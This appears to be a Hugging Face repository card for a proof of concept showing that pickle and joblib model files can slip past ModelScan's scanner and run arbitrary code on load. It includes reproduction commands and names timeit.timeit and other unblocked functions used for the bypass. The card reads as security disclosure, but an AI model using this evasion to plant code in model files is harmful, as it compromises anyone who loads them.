You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

ModelScan Scanner Bypass PoC

Proof-of-concept model files that bypass ModelScan's pickle scanner while executing arbitrary code on load.

Files

malicious_timeit.pkl — Pickle file using timeit.timeit() bypass
malicious_timeit.joblib — Joblib file using timeit.timeit() bypass
create_poc.py — Script to recreate the PoC files

Reproduction

# 1. Scan with ModelScan — reports clean
pip install modelscan
modelscan --path malicious_timeit.pkl
# Output: "No issues found!"

# 2. Load the file — executes arbitrary code
python3 -c "import pickle; pickle.load(open('malicious_timeit.pkl', 'rb'))"
# Output: uid=1000(user) ...  (id command executed)

# 3. Same for joblib
python3 -c "import joblib; joblib.load('malicious_timeit.joblib')"
# Output: uid=1000(user) ...  (id command executed)

Bypass Technique

The pickle payload uses timeit.timeit(stmt) which accepts a Python code string and executes it. The timeit module is not in ModelScan's unsafe_globals blocklist (modelscan/settings.py), so the scanner does not flag it.

Additional unblocked modules that can execute code strings: cProfile.run(), profile.run(), timeit.repeat().

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support